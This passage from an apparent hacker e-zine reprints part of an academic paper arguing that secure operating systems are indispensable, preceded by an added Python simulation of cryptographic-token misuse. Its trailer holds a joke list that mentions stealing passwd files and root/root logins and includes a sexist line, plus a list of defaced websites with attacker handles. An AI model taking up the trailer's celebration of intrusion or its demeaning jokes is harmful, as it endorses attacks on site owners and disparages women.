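The enforcer/decider decomposition of section 3.1 and the token misuse vulnerability of section 3.2, worked through as an added simulation (constructed for this reprint, not code from the paper): a token that only learns which user activated it lets any process of that user sign with any key, while a token that receives caller labels from the operating system can enforce per-domain rules, provided the policy those rules live in is itself protected by mandatory controls. The labels `mail_client`, `untrusted_applet` and `policy_admin`, the user `alice`, the key names and the `Process`/`PolicyStore`/`Token` classes are all assumptions of the example.

```python
import hashlib
import hmac
from dataclasses import dataclass

@dataclass(frozen=True)
class Process:
    pid: int
    uid: str     # discretionary identity: the user the process runs as
    domain: str  # mandatory label assigned by the OS, assumed tamperproof

# Constructed sample environment (hypothetical names, not from the paper).
ALICE_MAIL = Process(101, "alice", "mail_client")         # legitimate caller
ALICE_APPLET = Process(102, "alice", "untrusted_applet")  # malicious code alice ran
KEYS = {"mail_signing_key": b"constructed-key-material"}  # never leaves the token
RULES = [("mail_client", "mail_signing_key")]             # authorized (domain, key)

class PolicyStore:
    """Decision input for the decider.  writer_domains models OS protection of
    the policy file: None = discretionary only (any process of the owning user
    may write it); a set = only processes in those mandatory domains may."""

    def __init__(self, owner_uid, rules, writer_domains=None):
        self.owner_uid = owner_uid
        self.rules = set(rules)
        self.writer_domains = writer_domains

    def add_rule(self, proc, domain, key_id):
        if self.writer_domains is None:
            allowed = proc.uid == self.owner_uid          # DAC: same user suffices
        else:
            allowed = proc.domain in self.writer_domains  # MAC: trusted domain only
        if not allowed:
            raise PermissionError(f"{proc.domain} may not modify the policy")
        self.rules.add((domain, key_id))

class Token:
    """Cryptographic token: the enforcer gathers inputs and invokes the decider."""

    def __init__(self, keys, policy, caller_identity):
        self._keys = dict(keys)
        self._policy = policy
        # "uid":    the OS reports only which user activated the token (3.2's simple case)
        # "domain": the OS reports each caller's mandatory label over a protected path
        self._caller_identity = caller_identity
        self._active_uid = None

    def activate(self, proc):
        self._active_uid = proc.uid  # user activation, e.g. after a PIN prompt

    def _decide(self, proc, key_id):
        if proc.uid != self._active_uid:
            return False
        if self._caller_identity == "uid":
            return True              # every process of the user may use every key
        return (proc.domain, key_id) in self._policy.rules

    def sign(self, proc, key_id, data):
        if not self._decide(proc, key_id):
            raise PermissionError(f"{proc.domain} denied use of {key_id}")
        return hmac.new(self._keys[key_id], data, hashlib.sha256).hexdigest()

def can_sign(token, proc, key_id="mail_signing_key", data=b"constructed message"):
    try:
        token.sign(proc, key_id, data)
        return True
    except PermissionError:
        return False

def run_scenarios():
    """Report, per scenario, whether the malicious applet can use alice's key."""
    results = {}
    # 1. Token knows only the activating user: once alice activates it from
    #    her mail client, code she ran unknowingly can use the key as well.
    weak = Token(KEYS, PolicyStore("alice", RULES), caller_identity="uid")
    weak.activate(ALICE_MAIL)
    results["uid_only"] = can_sign(weak, ALICE_APPLET)

    # 2. Caller domains come from the OS, but the policy file has only
    #    discretionary protection, so the applet grants itself access.
    policy = PolicyStore("alice", RULES)
    dac = Token(KEYS, policy, caller_identity="domain")
    dac.activate(ALICE_MAIL)
    before = can_sign(dac, ALICE_APPLET)
    policy.add_rule(ALICE_APPLET, "untrusted_applet", "mail_signing_key")
    results["domain_dac_policy"] = (before, can_sign(dac, ALICE_APPLET))

    # 3. Caller domains plus a policy file writable only from a trusted
    #    domain: the applet is denied and cannot change the rules either.
    policy = PolicyStore("alice", RULES, writer_domains={"policy_admin"})
    mac = Token(KEYS, policy, caller_identity="domain")
    mac.activate(ALICE_MAIL)
    try:
        policy.add_rule(ALICE_APPLET, "untrusted_applet", "mail_signing_key")
        tampered = True
    except PermissionError:
        tampered = False
    results["domain_mac_policy"] = (tampered, can_sign(mac, ALICE_APPLET))
    results["legitimate_client"] = can_sign(mac, ALICE_MAIL)
    return results
```

Scenario 2 is the paper's point that caller identification alone is not enough: the decision inputs (here the policy rules) need the same mandatory protection as the token.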
If the assumption that initial keys are securely established within the token is removed, then there is the additional vulnerability that the initial keys may be observed or modified by an unauthorized entity. Unless the initial keys are provided via a dedicated physical interface to the cryptographic token, the operating system must protect the path between the initial key source and the cryptographic token and may need to protect the initial key source itself. Mandatory security mechanisms may be used to rigorously protect the path and the key source. A trusted path may be required for initial keying.

If the assumption that the cryptographic mechanism is confined to a single hardware token is removed and implemented in software instead, the confidentiality and integrity of the cryptographic mechanism's code and data becomes dependent on the operating system, including both memory protection and file protection. Mandatory security is needed to rigorously ensure the mechanism's integrity and confidentiality. If any external inputs, such as input parameters to a random number generator, are used by the cryptographic mechanism, the input sources and the path between the input sources and the cryptographic mechanism must be protected with mandatory security mechanisms.

4 Concrete Examples

This section further demonstrates that secure operating systems are necessary by showing that some widely accepted security solutions critically rely on the features of secure operating systems. In particular, this section examines mobile code security efforts, the Kerberos network authentication system, firewalls and network security protocols.

4.1 Mobile Code

A number of independently-developed security solutions for the World Wide Web, each with its own protection model, have been developed to protect against the threats from malicious mobile code. However, systems relying on these security solutions are vulnerable because of a lack of operating system support for security.
Primarily, this section will emphasize this point by focusing on efforts to secure Java [27], but other efforts will also be used to highlight issues. The primary threat that these solutions attempt to address is the threat of hostile mobile code gaining unauthorized access to a user’s files and resources in order to compromise confidentiality or integrity. The threat is not limited to interpreted applets loaded from the network by a web browser; both [26] and [30] extend this threat model to include helper applications which may have been actively installed by a user. There is little distinction between mobile code and what is traditionally considered data. For example, consider that Postscript documents are actually programs with potential access to the local filesystem. Consequently, helper applications which operate on untrustworthy data, such as Postscript viewers, must either be executed in a less flexible mode of operation, or must be carefully confined by the operating system. The basic Java Security Model is based on the notion of “sandboxing.” The system relies on the type-safety of the language in conjunction with the Java Security Manager to prevent unauthorized actions [27]. Efforts are currently underway to add additional security features to Java, such as capabilities, an expanded access control model, or additional controls over access to certain class libraries [70]. The fundamental limitation of these approaches is that none can be guaranteed to be tamperproof or unbypassable. For example, although the Java language is claimed to be secure, the Java Virtual Machine (JVM) will accept byte code which violates the language semantics and which can lead to security violations [32]. JVM implementation errors have led to violations of the language’s semantics [19]. A significant portion of the Java system is currently in the form of native methods which are implemented as object code and are not subject to the JVM’s type-safety checks. 
The JVM is not able to protect itself from tampering by other applications. Finally, the Java security model can offer no protection from the many other forms of malicious mobile code. In [30], the authors call for trusted systems to support a system-wide solution to address the threats presented by non-Java code. Even if such problems with the JVM did not exist, these security solutions would still suffer from the fundamental limitation that they rely on application-space access control for security. They all depend on the local file system to preserve the integrity of the system code, including class files. All of the systems which store policy locally depend on file system access control to preserve the integrity of the policy files. Section 3.1 demonstrated the importance of secure operating system features for supporting application-space access control. Another popular approach to “securing” mobile code is to require digitally signed applets and limit execution to those originating from trusted sources [27]. In fact, native ActiveX security is based entirely on digital signatures, as it has no form of access control [24][27]. The basic flaw with this approach is that it is an all-or-nothing proposition; the user cannot constrain a native ActiveX control to a limited security domain. Mandatory security mechanisms in the operating system may be used for this purpose, by confining the browser to a distinct security domain. Note that, although not sufficient by themselves, digital signatures will play an important part in mobile code security, even on secure operating systems. They can reduce the risk of malicious code entering the system, provide some measure of trust that an applet will behave properly, and provide another piece of information to use in making an access control decision. 
However, as with the general application-space cryptography described in section 3.2, the digital signature verification mechanism depends on secure operating system features to guarantee invocation, to protect the integrity of the mechanism, and to protect the integrity of the locally cached public keys.

The need for an operating system trusted path mechanism was highlighted by [67] which demonstrates the ease with which a trojan horse applet can capture credit card numbers, PIN numbers or passwords by perfectly emulating a window system dialog box. The proposed solution was an ad hoc user-level trusted path mechanism which required a user to customize his dialog box with a complicated graphical pattern. This solution is not adequate as it only increases the sophistication required in the trojan horse.

Other systems attempt to provide alternative security solutions to the mobile code threat. The Janus system [26] interposes on Solaris system calls to constrain untrusted native applications, and Safe-Tcl [49] provides a "safe interpreter" which attempts to limit the command set available to untrusted code. However, like the Java security solutions, these systems are subject to the same vulnerabilities as any other application-space access control mechanism; consequently, they require secure operating system support.

Beyond enabling all of the mobile code systems mentioned above to function securely, a secure system could also simplify them. Rather than implementing their security primitives in application space where they are vulnerable, they could utilize the system security services to provide a better overall system. A properly designed secure system would provide a flexible, economic foundation with one consistent security model for all of the different virtual machine efforts to use.

4.2 Kerberos

Kerberos [31][47] is a network authentication service originally developed for Project Athena at MIT.
In addition to providing an authentication service, Kerberos supports the establishment of session keys to support network confidentiality and integrity services. Derivatives of Kerberos have been used to provide authentication and key establishment services for AFS [64], DCE [53], and ONC RPC [21]. Kerberos and systems that rely on Kerberos have been suggested as a means of providing security for the World Wide Web [18][36][37].

Kerberos is based on symmetric cryptography with a trusted key distribution center (KDC) for each realm. The Kerberos KDC has access to the secret key of every principal in its realm. Consequently, a compromise of the KDC can be catastrophic. This is generally addressed by requiring that the KDC be both physically secure and dedicated solely to running the Kerberos authentication server [46] (see footnote 3). A typical environment also uses physically-secure dedicated systems for the servers using Kerberos. Without these environmental assumptions, the Kerberos authentication service and the Kerberized server applications would require secure operating system features to rigorously ensure that they are tamperproof and unbypassable. For the sake of argument, the remainder of this section will consider these environmental assumptions to be true and focus only on the security of the client workstations.

Footnote 3: Variants of Kerberos have been proposed that use asymmetric cryptography either to reduce the cost incurred by a penetration of the KDC or to completely eliminate the need for the KDC [63][66][42][18].

Kerberos was designed for an environment where the client workstations and the network are assumed to be completely untrustworthy [10][45]. However, since the software on the client workstation mediates all interactions between its user and the Kerberized server applications, this assumption implies that the Kerberized server applications must view all client applications as potentially malicious software.
Furthermore, a Kerberized server application has no means of establishing a trusted path to a user on a client workstation, since that would require trusted code on the client workstation. Thus, in a system that uses Kerberos, malicious software executed by a user is free to arbitrarily modify or leak a user's information, with no means of confinement; no distinctions between a user's legitimate requests and the requests of malicious software are possible. Given the increasing ease with which malicious software may be introduced into a system, the Kerberos environmental model seems untenable. As noted in [14], secure end-to-end transactions require trusted code at both end points.

As a basis of further discussion, suppose that there is a base set of trustworthy software on the client workstations which is protected against tampering, but that the client workstation operating system still lacks mechanisms for mandatory security and trusted path. Furthermore, suppose that the client workstation is a single-user system which does not export any services to other systems. In spite of these assumptions, a user is still vulnerable to attacks by malicious software, such as mobile code downloaded by the user. If the malicious software could spoof the client-side authentication program to the user, then it may be able to obtain a user's password. Even with one-time passwords, this attack would permit the malicious software to act on behalf of the user during the login session. A trusted path mechanism in the client workstation's operating system can be used to prevent such an attack. Additionally, such a trusted path mechanism in combination with support for a network protected path can be used to provide a trusted path between users and server applications.
If the malicious software can read the files used by the Kerberos client software to store tickets and session keys, then the malicious software may directly impersonate the user to the corresponding Kerberized server applications. Even if the session keys are encapsulated within a hardware cryptographic token, the malicious software can invoke the cryptographic token on behalf of the user, exploiting the misuse vulnerability discussed in section 3.2. Mandatory security mechanisms can be used to rigorously protect either the file or the cryptographic token against access by malicious software.

4.3 Network Security Protocols

The IPSEC network security protocols [5][3][4] are used to provide authentication, integrity, and confidentiality services at the IP layer. Typical implementations of the IPSEC protocols rely on application-space key management servers to perform key exchanges and supply keys for security associations. The IPSEC module in the network stack communicates with the local key management server via upcalls to retrieve the necessary information.

SSL [69] is another network security protocol that provides authentication, integrity, and confidentiality services and a negotiation service for keys and cryptographic algorithms. SSL, however, is implemented entirely in application space and requires no kernel modifications. SSL has been implemented as a library that interposes on socket calls to incorporate the SSL protocol between the underlying transport protocol of the socket (e.g., TCP) and the application protocol (e.g., HTTP).

Since it relies on application-space cryptography, the key management server used by IPSEC is subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for adequate protection.
In turn, since the protection provided by IPSEC depends on the protection of the keys, mandatory security mechanisms in the operating system are also crucial to meeting the security requirements of IPSEC. Since the complete SSL implementation operates in application space, it is directly subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for adequate protection.

Both IPSEC and SSL are intended to provide secure channels. However, as noted in [14], an end-to-end secure transaction requires a secure channel and secure end points. If an attacker can penetrate one of the end points and directly access the unprotected data, then the protection provided by IPSEC and SSL is only illusory.

4.4 Firewalls

A network firewall is a mechanism for enforcing a trust boundary between two networks. The analysis of this section is based on the discussions in [17][9][11][6]. Commonly, firewalls are used to maintain a separation between insiders and outsiders for an organization's computing resources. Internal firewalls may also be used to provide separation between different groups of insiders or to provide defense-in-depth against outsiders.

Modern firewall architectures typically involve the use of bastion hosts; in a screened subnet architecture, there may be an external bastion host on a perimeter network, which is highly exposed to outsiders, and an internal bastion host on the internal network, which is exposed to the external bastion host. The security of the bastion hosts is crucial to the security provided by the firewall. To reduce risk, bastion hosts are typically dedicated systems, only providing the minimal services required. Even with such minimal configuration, flaws in the proxy servers on the bastion host may permit penetration. However, mandatory security mechanisms in the operating systems of the bastion hosts may be used to confine proxy servers so that penetrations are narrowly limited.
Similarly, the bastion host’s mandatory security mechanisms may be used to protect proxy servers against tampering. Firewalls provide no protection against malicious insiders. Typically, insiders can easily leak information through the firewall. Malicious insiders can construct tunnels to permit outsiders to perform inbound calls through the firewall or may provide ways of bypassing a firewall entirely. Additionally, malicious insiders can exploit data leaked between users within the firewall. Although internal firewalls may be used to partition insiders into multiple trust classes, the granularity of protection is quite limited in comparison to what can be provided by a secure operating system. The ability of malicious insiders to leak data through the firewall can be confined by mandatory security mechanisms in the operating systems of the internal hosts. Likewise, mandatory security mechanisms in the operating systems of the internal hosts can confine outsiders who perform inbound calls through tunnels constructed by a malicious insider to the security domains in which the malicious insider is allowed to operate. In addition to the threat of malicious insiders, a firewall is at risk from the threat of malicious software executed by benign insiders. Typically, firewalls do not require that insiders strongly authenticate themselves to the firewall in order to access external services through the firewall [40]. Hence, if a benign insider executes malicious software on an internal host, the malicious software may seek to subvert the protection of the firewall in the same fashion as a malicious insider. An example of using a malicious Java applet to enable outsiders to penetrate a firewall is given in [40]. 
Even if insiders are required to strongly authenticate themselves to the firewall, a benign insider may still execute a trojan horse whose overt purpose requires external access; in this case, the malicious software may still subvert the protection of the firewall. Mandatory security mechanisms in the operating systems of the internal hosts may be used to protect users against execution of malicious software or to confine such software when it is executed. If strong authentication is required prior to accessing external services, mandatory security mechanisms could be used to ensure that only trustworthy software on the internal hosts can communicate with the strong authentication mechanism on the firewall. In any case, the mandatory security mechanisms would limit the ability of malicious software to leak information or support inbound calls. Firewalls are also susceptible to malicious data attacks [62]. Some example malicious data attacks relevant to firewalls are described in [68][40][16]. As with malicious insiders and malicious software, mandatory security mechanisms in the operating systems of the bastion hosts and the internal hosts may be used to confine malicious data attacks. When inbound services are supported by a firewall, the firewall itself cannot protect the remote system against compromise. The remote system’s operating system must protect against misuse of the allowed inbound services and must protect any information acquired through the inbound service against leakage. Mandatory security mechanisms in the remote system’s operating system may be used to provide such protection. Additionally, mandatory security mechanisms in the internal host’s operating system are needed to confine any attack from a penetrated remote system. When a benign insider wishes secure access to a remote service, the firewall itself cannot provide complete protection for the use of the remote service. 
The internal host's operating system must protect against any attempts by the server to trick the client into misusing its privileges, as in the case where a browser executes a malicious applet provided by a server; mandatory security mechanisms in the internal host's operating system may be used to confine these client applications.

5 System Security

No single technical security solution can provide total system security; a proper balance of security mechanisms must be achieved. Each security mechanism provides specific security functions and should be designed to only provide those functions. It should rely on other mechanisms for support and for required security services. In a secure system, the entire set of mechanisms complement each other so that they collectively provide a complete security package. Systems that fail to achieve this balance will be vulnerable.

As has been shown throughout this paper, a secure operating system is an important and necessary piece of the total system security puzzle, but it is not the only piece. A highly secure operating system would be insufficient without application-specific security built upon it. Certain problems are actually better addressed by security implemented above the operating system. One such example is an electronic commerce system that requires a digital signature on each transaction. An application-space cryptographic mechanism in the transaction system protected by secure operating system features might offer the best system security solution.

No single security mechanism is likely to provide complete protection. Unsolved technical problems, implementation errors and flawed environmental assumptions will result in residual vulnerabilities. As an example, covert channels remain a serious technical challenge for secure operating system designers. These limitations must be understood, and suitable measures must be taken to deploy complementary mechanisms designed to compensate for such problems.
In the covert channel example, auditing and detection mechanisms should be utilized to minimize the chances that known channels are exploited. In turn, these should depend on secure operating systems to protect their critical components, such as audit logs and intrusion sensors, because they are subject to the same types of vulnerabilities as those discussed throughout this paper.

6 Summary

This paper has argued that the threats posed by the modern computing environment cannot be addressed without secure operating systems. The critical operating system security features of mandatory security and trusted path have been explained and contrasted with the inadequate protection mechanisms of mainstream operating systems. This paper has identified the vulnerabilities that arise in application-space mechanisms for access control and cryptography and has demonstrated how mandatory security and trusted path mechanisms address these vulnerabilities. To provide a clear sense of the need for these operating system features, this paper has analyzed concrete examples of current approaches to security and has shown that the security provided by these approaches is inadequate in the absence of such features. Finally, the reader was given a perspective of system security where both secure operating systems and application-space security mechanisms must complement each other in order to provide the correct level of protection.

By arguing that secure operating systems are indispensable to system security, the authors hope to spawn a renewed interest in operating system security. If security practitioners were to more openly acknowledge their security solution's operating system dependencies and state these dependencies as requirements for future operating systems, then the increased demand for secure operating systems would lead to new research and development in the area and ultimately to commercially viable secure systems.
In turn, the availability of secure operating systems would enable security practitioners to concentrate on security services that belong in their particular components rather than dooming them to try to address the total security problem with no hope of success.

7 References

[1] M. Abrams et al. Information Security: An Integrated Collection of Essays. IEEE Comp. 1995.
[2] J. Anderson. Computer Security Technology Planning Study. Air Force Elect. Systems Div., ESD-TR-73-51, October 1972.
[3] R. Atkinson. IP Authentication Header (AH). IETF RFC 1826, August 1995.
[4] R. Atkinson. IP Encapsulating Security Payload (ESP). IETF RFC 1827, August 1995.
[5] R. Atkinson. Security Architecture for the Internet Protocol. IETF RFC 1825, August 1995.
[6] Badger et al. DTE Firewalls, Initial Measurement and Evaluation Report. Trusted Information Systems Technical Report #0632R, March 1997.
[7] L. Badger et al. Practical Domain and Type Enforcement for UNIX. Proceedings of IEEE Symposium on Security and Privacy, May 1995.
[8] D. Baker. Fortresses Built Upon Sand. Proceedings of the New Security Paradigms Workshop, 1996.
[9] S. Bellovin and W. Cheswick. Network Firewalls. IEEE Communications, September 1994.
[10] S. Bellovin and M. Merritt. Limitations of the Kerberos Authentication System. Computer Communications Review 20(5), October 1990.
[11] B. Blakley. The Emperor's Old Armor. Proceedings of the New Security Paradigms Workshop, 1996.
[12] W. Boebert and R. Kain. A Further Note on the Confinement Problem. Proceedings of the 30th IEEE International Carnahan Conference on Security Technology, 1996.
[13] W. Boebert and R. Kain. A Practical Alternative to Hierarchical Integrity Policies. Proceedings of the 8th National Computer Security Conference, 1985.
[14] E. Brewer et al. Basic Flaws in Internet Security and Commerce. http://http.cs.berkeley.edu/~gauthier/endpoint-security.html, 1995.
[15] W. Brierley. Integrating Cryptography into Trusted Systems: A Criteria Approach. Proceedings of the 8th IEEE Conference on Computer Security Applications, 1992.
[16] Computer Emergency Response Team. Advisory 93:16.
[17] D. Chapman and E. Zwicky. Building Internet Firewalls. O'Reilly, 1995.
[18] D. Davis. Kerberos Plus RSA for World Wide Web Security. Proceedings of the 1st USENIX Workshop on Electronic Commerce, July 1995.
[19] D. Dean et al. Java Security: From HotJava to Netscape and Beyond. Proceedings of the IEEE Symposium on Security and Privacy, 1996.
[20] DOD 5200.28-STD. Department of Defense Trusted Computer System Evaluation Criteria, December 1985.
[21] M. Eisler et al. Security Mechanism Independence in ONC RPC. Proceedings of the 6th USENIX UNIX Security Symposium, July 1996.
[22] D. Ferraiolo and R. Kuhn. Role-Based Access Control. Proceedings of the 15th National Computer Security Conference, 1992.
[23] B. Ford et al. Microkernels Meet Recursive Virtual Machines. Proceedings of the 2nd USENIX Symposium on Operating Systems Design and Implementation, October 1996.
[24] S. Garfinkel. Web Security and Commerce. O'Reilly & Associates, Cambridge, 1997.
[25] M. Gasser. Building a Secure Computer System. Van Nostrand Reinhold Company, New York, 1988.
[26] I. Goldberg et al. A Secure Environment for Untrusted Helper Applications. Proceedings of the 6th USENIX Unix Security Symposium, July 1996.
[27] L. Gong. Java Security: Present and Near Future. IEEE Micro, May/June 1997.
[28] R. Graubart. Operating System Support for Trusted Applications. Proceedings of the 15th National Computer Security Conference, 1992.
[29] M. Harrison et al. Protection in Operating Systems. Communications of the ACM 19(8), August 1976.
[30] T. Jaeger et al. Building Systems that Flexibly Control Downloaded Executable Content. Proceedings of the 6th USENIX Security Symposium, July 1996.
[31] J. Kohl and C. Neuman. The Kerberos Network Authentication Service V5. IETF RFC 1510, September 1993.
[32] M. LaDue. When Java Was One: Threats from Hostile Byte Code. Proceedings of the 20th National Information Systems Security Conference, 1997.
[33] B. Lampson. A Note on the Confinement Problem. Communications of the ACM 16(10), 1973.
[34] B. Lampson et al. Authentication in Distributed Systems: Theory and Practice. Proceedings of the 13th ACM Symposium on Operating Systems Principles, 1992.
[35] J. Lepreau et al. The Persistent Relevance of the Local Operating System to Global Applications. Proceedings of the 7th ACM SIGOPS European Workshop, September 1996.
[36] S. Lewontin. The DCE-Web Toolkit. Proceedings of the 3rd International World Wide Web Conference, 1995.
[37] S. Lewontin and M. Zurko. The DCE Web Project: Providing Authorization and Other Distributed Services to the World Wide Web. Proceedings of the 2nd International World Wide Web Conference, 1994.
[38] J. Liedtke. L4 Reference Manual. Research Report RC 20549, IBM T. J. Watson Research Center, September 1996.
[39] T. Linden. Operating System Structures to Support Security and Reliable Software. ACM Computing Surveys 8(4), Dec. 1976.
[40] D. Martin et al. Blocking Java Applets at the Firewall. Proceedings of the Internet Society Symposium on Network and Distributed Systems Security, 1997.
[41] D. Mazieres and M. Kaashoek. Secure Applications Need Flexible Operating Systems. Proceedings of the 6th Workshop on Hot Topics in Operating Systems, May 1997.
[42] A. Medvinsky et al. Public Key Utilizing Tickets for Application Servers. IETF Draft, Jan 1997, expires July 1997.
[43] S. Minear. Providing Policy Control Over Object Operations in a Mach Based System. Proceedings of the 5th USENIX Security Symposium, April 1995.
[44] NCSC-TG-005, Version 1. NCSC Trusted Network Interpretation, July 1987.
[45] C. Neuman and J. Steiner. Authentication of Unknown Entities on an Insecure Network of Untrusted Workstations. Proceedings of the Usenix Workshop on Workstation Security, August 1988.
[46] C. Neuman and T. Ts'o. Kerberos: An Authentication Service for Computer Networks. IEEE Communications Magazine, September 1994.
[47] C. Neuman et al. The Kerberos Network Authentication Service V5 R6. IETF Draft, July 1997, expires Jan 1998.
[48] R. O'Brien and C. Rogers. Developing Applications on LOCK. Proceedings of the 14th National Computer Security Conference, 1991.
[49] J. Ousterhout et al. The Safe-Tcl Security Model. Sun Labs Technical Report TR-97-60, March 1997.
[50] President's Commission On Critical Infrastructure Protection. Research and Development Recommendations for Protecting and Assuring Critical National Infrastructures, September 1997.
[51] M. Roe and T. Casey. Integrating Cryptography in the Trusted Computing Base. Proceedings of the 6th IEEE Conference on Computer Security Applications, 1990.
[52] RSA Laboratories. Public Key Cryptography Standard No. 11 - Cryptoki Version 2.0. RSA Laboratories, pp. 24-25, April 1997.
[53] R. Salz. DCE 1.2 Contents Overview. Open Group RFC 63.3, October 1996.
[54] J. Saltzer and M. Schroeder. The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), September 1975.
[55] B. Schneier. Applied Cryptography, 2nd Edition. John Wiley & Sons, New York, 1996. pp. 169-187, 216-225.
[56] Secure Computing Corporation. Assurance in the Fluke Microkernel: Formal Security Policy Model. Technical report MD A904-97-C-3047 CDRL A003, March 1998.
[57] Secure Computing Corporation. DTOS Covert Channel Analysis Plan. Technical report MD A904-93-C-4209 CDRL A017, May 1997.
[58] Secure Computing Corporation. DTOS Generalized Security Policy Specification. Technical report MD A904-93-C-4209 CDRL A019, June 1997. (http://www.securecomputing.com/randt/HTML/dtos.html)
[59] Secure Computing Corporation. DTOS General System Security and Assurability Assessment Report. Technical report MD A904-93-C-4209 CDRL A011, June 1997. (http://www.securecomputing.com/randt/HTML/dtos.html)
[60] Secure Computing Corporation. LOCKed Workstation Cryptographic Services Study. Technical Report MD A904-94-C-6045 CDRL A009, September 1995.
[61] Secure Computing Corporation. Security Requirements Specification and Requirements Rationale Report for the Technical Study Demonstrating the Feasibility of Software-Based Cryptography on INFOSEC Systems. Technical report MDA904-91-C-7103 CDRL A011 and A012, May 1994.
[62] W. Sibert. Malicious Data and Computer Security. Proceedings of the 19th National Information Systems Security Conference, 1996.
[63] M. Sirbu and J. Chuang. Distributed Authentication in Kerberos using Public Key Cryptography. Proceedings of the Symposium on Network and Distributed System Security, 1997.
[64] M. Spasojevic and M. Satyanarayanan. An Empirical Study of a Wide-Area Distributed System. ACM Transactions on Computer Systems 14(2), May 1996.
[65] S. Sutton and S. Hinrichs. MISSI B-level Windows NT Feasibility Study Final Report. Technical Report, NSA MISSI Contract MDA904-95-C-4088, December 1996.
[66] B. Tung et al. Public Key Cryptography for Initial Authentication in Kerberos. IETF Draft, expires Jan 1998.
[67] J. Tygar and A. Whitten. WWW Electronic Commerce and Java Trojan Horses. Proceedings of the 2nd Usenix Workshop on Electronic Commerce, November 1996.
[68] W. Venema. Murphy's Law and Computer Security. Proceedings of the 6th USENIX Unix Security Symposium, 1996.
[69] D. Wagner and B. Schneier. Analysis of the SSL 3.0 Protocol. Proceedings of the 2nd USENIX Workshop on Electronic Commerce, November 1996.
[70] D. Wallach et al. Extensible Security Architectures for Java. Technical Report 546-97, Dept. of Computer Science, Princeton University, April 1997.

[End] HTML links added. Conversion to HTML by JYA/Urban Deadline.
@HWA !=----------=- -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! 
#in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com

One of our sponsors, visit them now www.csoft.net

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCASTS TUES, SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed           //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

HOW YOU KNOW YOU'RE A TRY HARD HACKER by Radim Kolar

Document taken from The Ethernity Service network. All documents in this network are anonymous and may be freely distributed.

HOW YOU KNOW YOU'RE A TRY HARD HACKER
-------------------------------------

I just wrote this to tell all you try hard hackers something.

1) You go to other hacker pages on the web.
2) You think loading a program that was made by a hacker is hacking.
3) The only thing you do is get the latest passwd file from your ISP.
4) You go to channels like #hack and ask for passwd files.
5) You don't know where to get warez.
6) You always telnet to hosts and type login: root password: root and stuff like that.
7) You brag about how you are a hacker.
8) You don't know C.
9) You're a girl.
10) You don't know what a shell is.
11) You don't know what Linux, FreeBSD and all those other UNIXes are.
12) You don't have a UNIX OS.
13) You think that when you're using IRC war scripts, you're hacking.
14) You ask how to hack other people's computers.
15) You try cracking a shadowed passwd file.
16) You don't know if a passwd file is shadowed or not.
17) You ask what a T1 is.
18) You ask how to email bomb and you think email bombing is a form of hacking.
19) You're learning the BASIC language.
20) You think you can get into hacking straight away.
21) You don't know how to set up an eggdrop bot.
22) You think .mil sites stand for a country.

From http://netmag.cz/98/5/hacker.html

@HWA

SITE.1

#1 http://welcome.to/UnXplained SiteOp: Joe Cool
New underground site, features sections from Hacking to the Paranormal. This site has a lot of fluff, it looks really professional, some of the content however suffers due to this setup, ie: the hacking webpages' text is spread over many html pages instead of one textfile or page for easy downloading, other than that this site kicks ass, be sure to check it out. (coaxed into putting this here from irc by JoeCool, nice site! ... :)))

#2 http://www.security-news.com/ .de
German site, partially in English, also offers a security newsletter - eentity

#3 http://www.hackunlimited.com/
Finnish site, in Finnish, very nicely laid out, the only Finnish site in our international list, send in those international links! - Ed

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz, racism is a mug's game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga, visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Latest cracked pages courtesy of attrition.org

[99.08.07] NT [mozy] CDNiso (www.cdniso.com)
[99.08.07] So [HiP] CNCTek (www.cnctek.com)
[99.08.07] So [LevelSeven] Deluxe Solutions (www.deluxesolutions.com)
[99.08.07] So [SQ] M Energy Catalog (www.energycatalog.com)
[99.08.07] NT [fallen angels] Haxan Movies (www.haxan.com)
[99.08.07] NT [neeper] #2 Home Web (www.home-web.com)
